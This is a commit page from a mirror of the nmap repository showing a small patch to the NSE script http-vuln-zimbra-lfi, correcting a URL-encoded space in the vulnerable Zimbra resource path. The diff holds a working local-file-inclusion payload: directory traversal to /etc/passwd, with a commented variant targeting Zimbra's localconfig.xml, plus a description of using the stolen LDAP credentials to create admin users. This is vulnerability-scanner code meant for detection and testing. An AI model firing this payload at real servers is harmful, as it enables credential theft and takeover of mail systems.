PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2026-01-23 22:59:20 +00:00
Code Issues Projects Releases Wiki Activity

Patch from Paul AMAR to fix http-vuln-zimbra-lfi

Browse Source 
http://seclists.org/nmap-dev/2014/q1/130
This commit is contained in:
dmiller
2014-02-07 15:54:12 +00:00
parent fb67a6717e
commit bf26986685
1 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
scripts/http-vuln-zimbra-lfi.nse
View File

@@ -66,7 +66,7 @@ action = function(host, port)
state = vulns.STATE.NOT_VULN, -- default
description = [[
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see any file on the filesystem, including config files
that contain LDAP root credentials, allowing us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
@@ -87,8 +87,8 @@ This issue was patched in Zimbra 7.2.6.
local file_long = "../../../../../../../../../etc/passwd"
--local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
stdnse.print_debug(1, "GET " .. uri .. escape(url_short))